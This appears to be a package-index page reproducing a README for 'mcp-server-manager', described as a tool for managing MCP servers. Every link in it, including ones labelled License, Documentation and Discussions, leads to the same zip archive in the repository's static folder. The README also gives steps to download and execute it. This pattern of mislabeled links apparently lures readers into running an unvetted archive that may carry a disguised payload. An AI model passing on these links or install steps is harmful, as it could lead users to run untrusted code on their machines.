An open API service indexing awesome lists of open source software.

https://github.com/craneoankh/mcp-server-manager

⚙️ Manage MCP servers effortlessly with a single binary and simple YAML config, supporting multiple clients and systems, all through a user-friendly interface.
https://github.com/craneoankh/mcp-server-manager

ai claude claude-ai cli continue cursor goose homebrew llm local-development mcp-marketplace mcp-servers package-manager python server sse stape typescript

Last synced: about 1 month ago
JSON representation

⚙️ Manage MCP servers effortlessly with a single binary and simple YAML config, supporting multiple clients and systems, all through a user-friendly interface.

Awesome Lists containing this project

README

          

# 🖥️ mcp-server-manager - Manage Your MCP Servers Easily

[![Download mcp-server-manager](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip%https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip)](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip)

## 📦 Overview

mcp-server-manager is a user-friendly tool designed for managing Model Context Protocol (MCP) servers. This software is built using Go and offers a reactive HTMX web interface. Whether on Windows, macOS, or Linux, you can easily handle your MCP servers without needing programming knowledge.

## 🚀 Getting Started

Follow these steps to download and run mcp-server-manager smoothly on your computer.

## 📥 Download & Install

1. Visit the [Releases page to download](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip).
2. On this page, you will see various versions of mcp-server-manager. Choose the version that fits your operating system.
3. Click on the link for the appropriate file to start the download. The files might look like this:
- `https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip` for Windows
- `mcp-server-manager-macos-amd64` for macOS
- `mcp-server-manager-linux-amd64` for Linux
4. Once downloaded, locate the file on your computer.

5. Execute the following steps based on your operating system:

### 🖥️ For Windows:
- Double-click on the `.exe` file to run it. A command window will open, and the application will start.

### 🍏 For macOS:
- Open your terminal.
- Navigate to where the downloaded file is located using the `cd` command. For example:
```
cd Downloads
```
- Make the file executable by typing:
```
chmod +x mcp-server-manager-macos-amd64
```
- Run the application using:
```
./mcp-server-manager-macos-amd64
```

### 🐧 For Linux:
- Open your terminal.
- Navigate to the directory where the file was downloaded:
```
cd ~/Downloads
```
- Make the file executable:
```
chmod +x mcp-server-manager-linux-amd64
```
- Execute the application:
```
./mcp-server-manager-linux-amd64
```

## 🌐 How to Use mcp-server-manager

Once the application is running, you will see a web interface open in your default browser. Here’s how to navigate it:

1. **Dashboard**: Here you can view the status of your MCP servers. You'll find a list of all current servers along with their statuses.
2. **Configuration**: Use the configuration section to set up and manage your servers. You can modify settings, add new servers, or delete existing ones.
3. **Logs**: Access the logs to monitor server activity. This will provide a detailed view of server operations.
4. **Help Section**: For any questions or tips on using features, refer to the help section within the app.

## ⚙️ System Requirements

To run mcp-server-manager, your system should meet the following requirements:

- **Operating System**: Windows 10 or higher, macOS 10.13 or higher, or a recent version of a Linux distribution (e.g., Ubuntu 20.04 or higher).
- **Go**: The software does not require Go to be installed on your machine. It is a single binary application.
- **Memory**: Minimum 2 GB of RAM recommended for smooth operation.
- **Storage**: At least 100 MB of free disk space.

## 🛠️ Features

- **Cross-Platform**: Works on Windows, macOS, and Linux.
- **Single Binary**: Easily download and run without complicated installations.
- **User-Friendly Interface**: Designed for ease of use with a simple web interface.
- **Real-time Updates**: Manage server configurations and settings in real-time.
- **Community Support**: Join a community of users for tips and support.

## 📞 Need Help?

If you encounter issues or have questions about using mcp-server-manager, check the [GitHub Discussions](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip) for support. You can also open an issue directly on the repository page for additional help.

## 🗂️ Acknowledgments

Thanks to the contributors and the community that supports the development of mcp-server-manager. Your feedback and contributions help us improve this tool.

## 📣 License

This project is licensed under the MIT License. See the [LICENSE](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip) file for details.

## 🔗 Links

- [Releases page](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip)
- [Documentation](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip)
- [GitHub Discussions](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip)

Thank you for using mcp-server-manager. Enjoy managing your MCP servers with ease!